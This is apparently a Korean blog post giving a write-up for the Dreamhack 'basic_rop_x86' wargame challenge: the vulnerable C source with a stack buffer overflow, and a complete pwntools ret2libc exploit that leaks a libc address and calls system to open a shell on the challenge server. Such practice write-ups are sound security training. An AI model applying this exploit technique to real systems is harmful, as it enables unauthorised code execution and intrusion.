외로운 Nova의 작업실

dreamhack - basic_rop_x86 write up 본문

Computer App Penetesting/System Vulnerability

dreamhack - basic_rop_x86 write up

Nova_ 2023. 4. 20. 14:47

- source code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main(int argc, char *argv[]) {
    char buf[0x40] = {};

    initialize();

    read(0, buf, 0x400);
    write(1, buf, sizeof(buf));

    return 0;
}

 

- exploit code

from pwn import *

p = remote("23.81.42.210", 10466)

e = ELF("./basic_rop_x86")
libc = ELF("./libc.so.6")

#val
puts_plt = e.plt['puts']
read_plt = e.plt['read']
read_got = e.got['read']
pop_esi_edi_ebp = 0x08048689
pop_ebp = 0x0804868b
main = 0x080485d9

#overflow buf
payload = b"A"*0x44 + b"B"*0x4

#get real address read
payload += p32(puts_plt)
payload += p32(pop_ebp)
payload += p32(read_got)
payload += p32(main)


#proc - 1
p.send(payload)
print(p.recvn(64))
read = u32(p.recvn(4))
print(read)
lb = read - libc.symbols["read"]
system = lb + libc.symbols["system"]
shell = lb + 0x15902b

#excute read_plt = system
payload = b"A"*0x44 + b"B"*0x4
payload += p32(system)
payload += p32(pop_ebp)
payload += p32(shell)

#proc - 2
p.send(payload)
p.interactive()

 

- write

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - hook write up  (0) 2023.04.22
dreamhack - oneshot write up  (0) 2023.04.21
dreamhack - basic_rop_x64 write up  (0) 2023.04.20
dreamhack 시스템해킹 - 12(ssp_001 문제 풀이)  (0) 2023.02.22
해킹 실습 환경 만들기  (0) 2023.02.13
'Computer App Penetesting/System Vulnerability' Related Articles more
Comments